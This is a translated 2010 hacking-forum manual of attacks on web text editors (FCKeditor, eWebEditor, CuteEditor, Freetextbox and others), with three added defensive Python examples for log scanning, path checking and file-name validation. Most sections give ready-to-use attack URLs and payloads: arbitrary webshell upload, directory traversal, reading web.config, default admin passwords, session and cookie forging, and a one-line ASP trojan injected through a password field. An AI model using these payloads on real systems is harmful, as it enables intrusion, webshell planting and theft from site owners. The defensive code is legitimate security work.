myhack58 | 佚名 (Anonymous) | MYHACK58:62201026397

Web Editor Vulnerability Manual (Comprehensive Edition) - Vulnerability Alerts - Black Bar Safety Net

2010-03-11 00:00:00
佚名 (Anonymous)
www.myhack58.com

FCKeditor

FCKeditor editor page / editor version / file upload path

Editor page:
FCKeditor/_samples/default.html

Editor version:
FCKeditor/_whatsnew.html

File upload path:
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

The "url=/xxx" part on the second line of the returned XML is the default upload path the connector references.

Note: [Hell1] As of 2010-02-15 the latest FCKeditor release is v2.6.6.
[Hell2] Remember to change the two occurrences of "asp" to the script language the target's FCKeditor actually uses.

FCKeditor passive restriction policy leads to lax filtering
Affected versions: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability description:
FCKeditor v2.4.3's File category denies the following upload types by default: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

FCKeditor 2.0 <= 2.2 allows files with the asa, cer, php2, php4, inc, pwml and pht suffixes to be uploaded.
After upload the file is saved directly with $sFilePath = $sServerDir . $sFileName, without using $sExtension as the suffix.
On Windows this means appending a "." to the uploaded file name bypasses the check [not tested].
On Apache the "Apache filename parsing flaw" can also be used, see Appendix A.

It is also suggested to use the File category when defining the Type variable for the other upload vulnerabilities, since according to FCKeditor's code its restriction is the narrowest.
Attack use:
Any other suffix can be uploaded.

Note: [Hell1] Original: <http://superhei.blogbus.com/logs/2006/02/1916091.html>

Using the Windows 2003 path parsing vulnerability to upload a web shell
Affected versions: see Appendix B
Vulnerability description:
Using the Windows 2003 path parsing vulnerability (Appendix B), create a directory with a name such as "bin.asp"; any file uploaded into that directory is then handed to the corresponding script interpreter and executed with script permissions.
Attack use:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

FCKeditor PHP arbitrary file upload vulnerability

Affected versions: FCKeditor 2.2 <= FCKeditor 2.4.2
Vulnerability description:
FCKeditor has an input validation error when processing file uploads; a remote attacker can exploit it to upload arbitrary files.
When uploading through editor/filemanager/upload/php/upload.php, passing an invalid value for the Type parameter allows arbitrary scripts to be uploaded.
A successful attack requires file upload to be enabled in the config.php configuration file; it is disabled by default.
Attack use (please modify the action field to the target URL):
FCKeditor<=2.4.2 for php.html
Note: To try the v2.2 vulnerability, set Type to any value; but if you change it back to Media you must capitalize the M, otherwise on Linux FCKeditor's case-sensitive check of the file directory fails and the upload does not succeed.

Type custom variable arbitrary file upload vulnerability

Affected versions: earlier versions
Vulnerability description:
By customizing the Type parameter you can create or upload files to a directory of your choosing, and the new directory has no upload file format restrictions.
Attack use: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

Opening this address lets you upload any type of file; the shell's default upload location is:
<http://www.heimian.com/UserFiles/all/1.asp>
"Type=all" is a custom variable: it creates the directory "all", and newly created directories have no upload file format restrictions.

For example, entering:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
uploads the web shell into the site's root directory.
Note: If you cannot find the default upload folder, check this file: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor directory traversal vulnerability
Affected versions: the aspx version of FCKeditor; other versions not tested
Vulnerability description: for obtaining a webshell see "Type custom variable arbitrary file upload vulnerability" above.
Attack use:
Modify the CurrentFolder parameter, using ../../ to move into a different directory:
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp

The returned XML lists all directories on the website:
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

FCKeditor: other webshell upload paths
Affected versions: non-optimized / non-streamlined versions of FCKeditor
Vulnerability description:
If the following files exist, opening them allows files to be uploaded.
Attack use:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor file upload "." to "_" replacement bypass
Affected versions: FCKeditor >= 2.4.x
Vulnerability description:
An uploaded file such as shell.php.rar or shell.php;.jpg becomes shell_php;.jpg; this is a change in the newer FCK versions.
Attack use:
Submit 1.php followed by a space and all of it is bypassed.
※ However, trailing spaces only work on Windows; *nix does not support this (there 1.php and "1.php " are two different files).

Note: upload/2010/3/201003102334372778.jpg (this format is filtered, i.e. the IIS6 parsing vulnerability is blocked).
On the first upload, 123.asp;123.jpg is filtered to 123_asp;123.jpg, so it does not run.
But upload the same file 123.asp;123.jpg a second time: because "123_asp;123.jpg" already exists,
the file is named 123.asp;123(1).jpg, 123.asp;123(2).jpg, and so on in sequence.
So the IIS6 vulnerability can still be exploited.

If the above steps do not succeed, the possible reasons are:

  1. FCKeditor's file upload function is not enabled; it is off by default when FCKeditor is installed, and FCKeditor returns an error message if you try to upload a file.
  2. The site uses a streamlined version of FCKeditor; the Lite FCKeditor lacks many features, including file upload.
  3. This FCKeditor vulnerability has been fixed.
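As an added defensive example (not part of the original manual), the following Python scans web-server access log lines for the FCKeditor file-manager request shapes listed in this section: connector and browser.html hits, a custom Type value, traversal in Type or CurrentFolder, CreateFolder with a script-looking folder name (Appendix B), and the test.html upload pages. The log lines, the endpoint list and the finding tags are this example's own constructions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (combined log format); hosts, timestamps and
# paths are made up for this example.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2010:00:00:01 +0800] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.5 - - [11/Mar/2010:00:00:02 +0800] "GET /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Mar/2010:00:00:03 +0800] "GET /fckeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp HTTP/1.1" 200 2048',
    '203.0.113.5 - - [11/Mar/2010:00:00:04 +0800] "GET /fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp HTTP/1.1" 200 2048',
    '203.0.113.5 - - [11/Mar/2010:00:00:05 +0800] "GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp HTTP/1.1" 200 300',
    '203.0.113.5 - - [11/Mar/2010:00:00:06 +0800] "GET /fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 900',
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# File-manager entry points named in the manual: the browser page, the
# per-language connectors, the PHP uploader and the two test.html pages.
EDITOR_ENDPOINTS = re.compile(
    r"/filemanager/(?:browser/default/(?:browser\.html|connectors/[^/]+/connector\.\w+)"
    r"|upload/(?:[^/]+/upload\.\w+|test\.html)"
    r"|browser/default/connectors/test\.html)",
    re.IGNORECASE,
)

# The only resource types FCKeditor's stock connectors define.
KNOWN_TYPES = {"file", "image", "flash", "media"}

# Extensions that IIS 6 (Appendix B) or the server-side language would execute.
SCRIPT_EXT = re.compile(r"\.(?:asp|asa|cer|cdx|aspx|php\d?|jsp|cgi|pl)\b", re.IGNORECASE)


def classify_request(url: str) -> list:
    """Return finding tags for one request URL; empty means no editor endpoint was hit."""
    parts = urlsplit(url)
    if not EDITOR_ENDPOINTS.search(parts.path):
        return []
    findings = ["fckeditor_endpoint"]
    # parse_qs decodes percent-encoding once; the extra unquote also exposes
    # double-encoded values such as %252F.
    params = {
        k.lower(): [unquote(v) for v in vals]
        for k, vals in parse_qs(parts.query, keep_blank_values=True).items()
    }
    if any(t.lower() not in KNOWN_TYPES for t in params.get("type", [])):
        findings.append("custom_type")  # Type=all, Type=../ and similar
    for name in ("type", "currentfolder", "newfoldername", "connector"):
        if any(".." in v or "\\" in v for v in params.get(name, [])):
            findings.append("path_traversal")
            break
    command = params.get("command", [""])[0].lower()
    if command == "createfolder" and any(SCRIPT_EXT.search(v) for v in params.get("newfoldername", [])):
        findings.append("script_named_folder")  # folder named like aspx.asp (Appendix B)
    if parts.path.lower().endswith("/test.html"):
        findings.append("upload_probe")
    return findings


def scan_log(lines) -> list:
    """Return (client_ip, url, findings) for every line that touches an editor endpoint."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("url"))
        if findings:
            hits.append((m.group("ip"), m.group("url"), findings))
    return hits


if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(findings), url)
```

A plain "fckeditor_endpoint" hit on the connector with Command=GetFoldersAndFiles is what the reconnaissance step at the top of this section looks like in a log, so it is worth reporting even without a second tag; the other tags mark the specific misuse described above.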

--------------------------------------------------------------------------------
eWebEditor
eWebEditor usage basics
Default backend address: /ewebeditor/admin_login.asp
Recommended first check: whether the file admin_style.asp can be accessed directly.

Default database path: [PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb (the database in some CMSs)
You can also try [PATH]/db/%23ewebeditor.mdb (a little trick some administrators use)

Default passwords: admin/admin888 or admin/admin; you can also try admin/123456, which some administrators and some CMSs set, to enter the backend.

1, Click "Style management": select a new style, or modify a non-system style. The image control there governs the allowed upload types; add |asp, |asa, |aaspsp or |cer (any script type works as long as the server allows it to execute). Click "Submit", then in the toolbar settings add the "Insert image" control. Then preview the style, click Insert image, upload the webshell, and view the file upload path in "code" mode.

2, When the administrator has changed the database to an asp or asa suffix, a one-line trojan can be inserted into the database through the client, and the one-line trojan client then connects to it to obtain a webshell.
3, Upload not possible? Directory has no permissions? Go back to style management and look at the style you edited: it allows a custom upload path!!!
4, Upload type set, but still cannot upload? The file code has probably been changed; try setting the "remote type" and obtaining the shell the way described for version 6.0 below, and set the remote file types to be saved automatically.
5, Cannot add a toolbar, but can set file types in a style? Do this ↓
(Please modify the action field)
Action.html

eWebEditor: following predecessors' footprints
Vulnerability description:
When you have downloaded the database but cannot look up the plaintext of the password MD5, go and look at the eWebEditor_Style table (14 styles): see whether a previous intruder has already left behind a style that allows script upload, and construct the address to upload your own webshell.
Attack use:
For example ID=46, s_name=standard1
Configuration code: ewebeditor.asp?id=content&style=standard
After changing the ID and the style name:
ewebeditor.asp?id=46&style=standard1

eWebEditor directory traversal vulnerability
Vulnerability description:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
Filtering is lax, leading to directory traversal.
Attack use:
First: ewebeditor/admin_uploadfile.asp?id=14
After id=14 add &dir=..
Then &dir=../..
&dir=http://www.heimian.com/../.. lists the whole website's files.
Second: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..

eWebEditor 5.2 directory listing vulnerability
Vulnerability description:
ewebeditor/asp/browse.asp
Filtering is lax, leading to directory traversal.
Attack use:
http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=...././/

eWebEditor session spoofing vulnerability: entering the backend
Vulnerability description:
Vulnerable file: Admin_Private.asp
It only checks the session, without cookie or path verification.
Attack use:
Create a new test.asp containing:
<%Session("eWebEditor_User") = "11111111"%>
Access test.asp, then access any backend file, for example Admin_Default.asp

eWebEditor ASP version 2.1.6 upload vulnerability
Attack use: please modify the action field to the target URL
ewebeditor asp 版 2.1.6 上传漏洞利用程序.html (eWebEditor ASP version 2.1.6 upload vulnerability exploit program.html)

eWebEditor 2.7.0 injection vulnerability
Attack use:
http://www.heimian.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
Default table name: eWebEditor_System; default column names: sys_UserName, sys_UserPass; then use NBSI to guess them.

eWebEditor 2.8.0 Ultimate Edition arbitrary file deletion vulnerability
Vulnerability description:
The vulnerability is in the delete.asp file in the Example\NewsSystem directory, an eWebEditor test page that can be entered directly without logging in.
Attack use (please modify the action field to the target URL):
Del Files.html

eWebEditor v6.0.0 upload vulnerability
Attack use:
In the editor click "Insert image", then "Network", and enter the address of your webshell in the box. Note: the file name must be of the form xxx.jpg.asp or similar. Confirm, then click the "Remote file automatic upload" control (on first use you will be prompted to install the control); then view "code" mode to find the file upload path and access it. The official eWeb demo can be done this way too, but its upload directory has execute permissions removed, so the uploaded web shell cannot run.

eWebEditor for PHP/ASP universal backend bypass vulnerability
Affected versions: PHP 3.0~3.8, also ASP version 2.8; lower versions may also work, to be tested.
Attack use:
Go to the backend /eWebEditor/admin/login.php and enter any user and password; an error will be shown.
Now clear the browser's URL bar and enter:

javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));

pressing Enter after each of the three. Then clear the browser's URL again and enter a file that is normally not accessible, such as ../ewebeditor/admin/default.php; it opens directly.

eWebEditor for PHP arbitrary file upload vulnerability
Affected versions: eWebEditor for PHP v3.8 and older
Vulnerability description:
This version saves all style configuration information in the array $aStyle; when register_globals is on in php.ini we can add any style we like and define its upload types.
Attack use:
phpupload.html

eWebEditor JSP version vulnerabilities
Much the same; I will not say more about them in this document, because I have no test environment and the online dumps are huge and hard to investigate. Among JSP editors, I think eWeb's share is much smaller than FCKeditor's.
Links:
<http://blog.haaker.cn/post/161.html>
<http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml>

eWebEditor 2.8 Business Edition: inserting a one-line trojan
Affected versions: >= 2.8 Business Edition
Attack use:
Log in to the backend, click Change Password, and set the new password to 1":eval request("h")'
After it is set, access the asp/config.asp file; the one-line trojan has been written into that file.

eWebEditorNet upload.aspx upload vulnerability (WebEditorNet)
Vulnerability description:
WebEditorNet's upload.aspx file has an upload vulnerability.
Attack use:
Default upload address: /ewebeditornet/upload.aspx
A cer trojan can be uploaded directly.
If the upload does not go through, enter javascript:lbtnUpload.click(); in the browser address bar.
After success, view the source and look for uploadsave to find the save address; by default files are saved to the uploadfile folder.

southidceditor (generally uses the v2.8.0 eWeb core)
<http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb>
<http://www.heimian.com/admin/southidceditor/admin/admin_login.asp>
<http://www.heimian.com/admin/southidceditor/popup.asp>

bigcneditor (eWeb 2.7.5 VIP core)
The so-called Bigcneditor is in fact the eWebEditor 2.7.5 VIP user edition. The reason admin_login.asp cannot be accessed and shows the four-character mantra "insufficient permissions" is probably a "Licensed" authorization issue: perhaps only authorized machines may access the backend.

Perhaps the little tricks above for eWebEditor v2.8 and lower can be used up to here. Looks like not much more can be done?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor online editor local file include vulnerability
Affected versions:
CuteEditor for .NET 6.4
Vulnerability description:
Any file on the website can be viewed at will; the impact is large.
Attack use:
http://www.heimian.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

--------------------------------------------------------------------------------
Webhtmleditor
Using the Windows 2003 IIS file name parsing vulnerability to get a shell
Affected versions: <= Webhtmleditor final version 1.7 (no longer updated)
Vulnerability description / attack:
Uploaded pictures and other files are not renamed, so a malicious user can upload diy.asp;.jpg to bypass the extension check. Because of this mistake by the editor's author, even if a thumbnail or file-header check is encountered, a one-line trojan inserted into a picture file can still get through.

--------------------------------------------------------------------------------
Kindeditor
Using the Windows 2003 IIS file name parsing vulnerability to get a shell
Affected versions: <= kindeditor 3.2.1 (the latest version, released August 2009)
Vulnerability description / attack:
A demo was done on the official site: go to upload/2010/3/201003102334381513.jpg to have a look.
Note: see Appendix C for the parsing principle.

--------------------------------------------------------------------------------
Freetextbox
Freetextbox directory traversal vulnerability
Affected versions: unknown
Vulnerability description:
The ftb.imagegallery.aspx code only filters "/" and does not filter the "\" character, so a directory traversal problem results.
Attack use:
Click the image button on the editor page; the pop-up box gives this address. Construct it as follows to traverse the directory:
http://www.heimian.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\
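Every directory parameter in this manual (FCKeditor's Type and CurrentFolder, eWebEditor's dir, CuteEditor's file, Freetextbox's rif/cif) fails the same way: the value is joined to a base directory after filtering only one of "..", "/" or "\". As an added example that is not part of the original manual or any of these products, the following Python shows a single resolver that keeps such a parameter inside its resource root: it decodes percent-encoding until stable, treats backslash as a separator, rejects any all-dots segment, whitelists the Type value, and finally checks the normalised result against the root. The base directory, resource types and sample inputs are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Resource types FCKeditor's connectors define; anything else (Type=all, Type=../) is rejected.
ALLOWED_TYPES = {"File", "Image", "Flash", "Media"}


class UnsafePath(ValueError):
    """Raised when a client-supplied directory parameter cannot be accepted."""


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding until stable so %2F, %252E and friends cannot hide a separator."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise UnsafePath("too many encoding layers")


def safe_user_folder(base_dir: str, type_param: str, current_folder: str) -> str:
    """Map (Type, CurrentFolder) to a directory guaranteed to stay under base_dir/<Type>.

    base_dir is the upload root (the manual's UserFiles directory); the result is a
    lexically normalised POSIX path.
    """
    if type_param not in ALLOWED_TYPES:
        raise UnsafePath(f"unknown resource type {type_param!r}")
    folder = fully_decode(current_folder)
    if "\x00" in folder:
        raise UnsafePath("NUL byte in path")
    # Freetextbox only filtered '/', so treat '\' as a separator before checking.
    folder = folder.replace("\\", "/")
    segments = [s for s in folder.split("/") if s not in ("", ".")]
    for seg in segments:
        # '..' is a parent reference; '...' and longer runs have been collapsed by
        # some Windows/IIS versions, so refuse any all-dots segment.
        if set(seg) == {"."}:
            raise UnsafePath(f"illegal path segment {seg!r}")
    root = posixpath.normpath(posixpath.join(base_dir, type_param))
    resolved = posixpath.normpath(posixpath.join(root, *segments))
    # Belt and braces: the segment check above should already make this impossible.
    if resolved != root and not resolved.startswith(root + "/"):
        raise UnsafePath("path escapes the resource root")
    return resolved


def is_safe_user_folder(base_dir: str, type_param: str, current_folder: str) -> bool:
    """Boolean wrapper for logging or tests."""
    try:
        safe_user_folder(base_dir, type_param, current_folder)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    # Constructed inputs: the first two are legitimate, the rest are the
    # traversal shapes from the manual.
    for type_, folder in [("Image", "/"), ("Image", "/photos/2010/"), ("all", "/"),
                          ("Image", "../../../"), ("Image", "..%2F..%2F"),
                          ("Image", "%252e%252e/"), ("Image", "..\\..\\web.config"),
                          ("Image", "...././/")]:
        print(f"{type_:5} {folder!r:22} -> {is_safe_user_folder('/var/www/UserFiles', type_, folder)}")
```

The check is purely lexical; on a real server, resolve the returned path with os.path.realpath as well, so that a symbolic link placed inside the upload tree cannot point the resolved directory back outside the root.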
--------------------------------------------------------------------------------

Appendix A:
Apache file name parsing flaw:
Test environment: apache 2.0.53 on Windows XP, apache 2.0.52 on Red Hat Linux

  1. Abroad, SSR TEAM issued an advisory about a vulnerability in Apache's MIME module (mod_mime): attack.php.rar is executed as a PHP file, including the Discuz! p11.php.php.php.php.php.php.php.php.php.php.php.php.rar vulnerability.

  2. S4T's superhei wrote a blog post about this small Apache characteristic: Apache checks suffixes starting from the end and executes according to the last valid suffix. Just look at the index.XX files installed by default in Apache's htdocs and you will understand.

  3. superhei has said it very clearly: this can be used in upload vulnerabilities. The commonly allowed upload file formats I tested include the following (the classification is chaotic, don't blame me):
    Typical type: rar
    Backup type: bak, lock
    Streaming media type: wma, wmv, asx, as, mp4, rmvb
    Microsoft: sql, chm, hlp, shtml, asp
    Any type: test, fake, ph4nt0m
    Special type: torrent
    Program type: jsp, c, cpp, pl, cgi

  4. The key to the whole vulnerability is what Apache treats as a "valid suffix"; anything that is not a "valid suffix" can be used.

  5. Test environment:
    a.php
    <?php phpinfo(); ?>
    Then add any suffix and test: a.php.aaa, a.php.aab ...

By cloie, ph4nt0m.net Security.

Appendix B:
On an IIS6 server (Windows 2003), the affected file name suffixes are: .asp .asa .cdx .cer .pl .php .cgi

Windows 2003 Enterprise Edition is Microsoft's mainstream server operating system (<http://www.myhack58.com/Article/48/Article_048_1.htm>). Windows 2003 IIS6 has a file path parsing vulnerability: when a folder is named something like hack.asp, so that the folder name looks like an ASP file name, any type of file under that folder (for example .gif, .jpg, .txt, etc.) is executed by IIS as an ASP program. A hacker can upload a trojan file with a picture-like extension such as jpg or gif and run it by accessing that file. If any folder on the site has a name ending in .asp, .php, .cer, .asa, .cgi, .pl and so on, then any of the above file types placed in those folders may be treated as script files, handed to the script parser and executed.

Appendix C:
Vulnerability description:
When a file is named [YYY].asp;[ZZZ].jpg, Microsoft IIS automatically parses it as ASP.
When a file is named [YYY].php;[ZZZ].jpg, Microsoft IIS automatically parses it as PHP.
Here [YYY] and [ZZZ] are arbitrary strings.
Affected platforms:
Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)
Repair methods:
1, Wait for the relevant Microsoft patch.
2, Remove script execution permissions from the directory where images are stored (if your images are not stored mixed with program files).
3, Check all image upload code segments in the website's program and intercept file names of the form [YYY].asp;[ZZZ].jpg.
Note:
Windows Server 2008 (IIS7) and Windows Server 2008 R2 (IIS7.5) are not affected.
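Repair method 3 above, the FCKeditor "." to "_" section and Appendix A all come down to the same server-side check on the uploaded file name. As an added example (not code from the manual or from any of the editors it covers), the following Python implements that check in one place: it flags the IIS 6 semicolon form from Appendix C, every dotted token rather than only the last one because of Apache's mod_mime behaviour in Appendix A, trailing spaces and dots that Windows strips, path components and NUL bytes, and an allow-list miss; and, rather than renaming the client's name as the newer FCKeditor does, it stores the file under a server-generated name. The allow-list, the deny tokens (FCKeditor 2.4.3's list plus Appendix B's suffixes) and the sample names are this example's own.

```python
import re
import secrets

# Allow-list for an image upload slot (constructed for this example).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Deny tokens: FCKeditor 2.4.3's File deny list plus the IIS 6 suffixes from Appendix B.
SCRIPT_EXT = set(
    "html htm php php2 php3 php4 php5 phtml pwml inc asp aspx ascx jsp cfm cfc pl bat exe com dll "
    "vbs js reg cgi htaccess asis sh shtml shtm phtm asa cer cdx pht".split()
)


def filename_risks(name: str) -> list:
    """Return the reasons a client-supplied file name must not be stored under that name."""
    risks = []
    if "\x00" in name:
        risks.append("nul_byte")
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if base != name:
        risks.append("path_component")
    # Windows silently drops trailing spaces and dots, so "1.php " is stored as "1.php".
    if base != base.rstrip(" ."):
        risks.append("trailing_space_or_dot")
    # IIS 6 executes "x.asp;y.jpg" as ASP (Appendix C): inspect each ';'-separated piece.
    pieces = base.split(";")
    if len(pieces) > 1:
        risks.append("semicolon")
    # Apache mod_mime looks at every dotted token (Appendix A), not only the last one,
    # so "shell.php.rar" is as dangerous as "shell.php".
    tokens = [t.rstrip(" .").lower() for piece in pieces for t in piece.split(".")[1:]]
    if any(t in SCRIPT_EXT for t in tokens):
        risks.append("script_extension")
    ext = base.lower().rsplit(".", 1)[-1] if "." in base else ""
    if ext not in ALLOWED_EXT:
        risks.append("extension_not_allowed")
    return risks


def accepts(name: str) -> bool:
    """True when the name carries none of the risks above."""
    return not filename_risks(name)


def safe_store_name(name: str) -> str:
    """Return a server-generated storage name (random hex + allow-listed extension).

    The client name is used only to pick the extension; the stored name never contains
    client-controlled characters, so none of the rename tricks above apply.
    """
    risks = filename_risks(name)
    if risks:
        raise ValueError(f"rejected {name!r}: {', '.join(risks)}")
    ext = name.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    # Constructed sample names: the bypass shapes discussed in the manual plus two good ones.
    for n in ["photo.JPG", "good.png", "shell.php.rar", "diy.asp;.jpg", "123.asp;123(1).jpg",
              "1.php ", "shell_php;.jpg", "..\\web.config", "a.php"]:
        print(f"{n!r:22} -> {filename_risks(n) or 'ok'}")
```

Note that the renamed form shell_php;.jpg is still refused because of the semicolon alone; the FCKeditor numbering behaviour described in the "." to "_" section never arises when the stored name is generated by the server instead of derived from the client's.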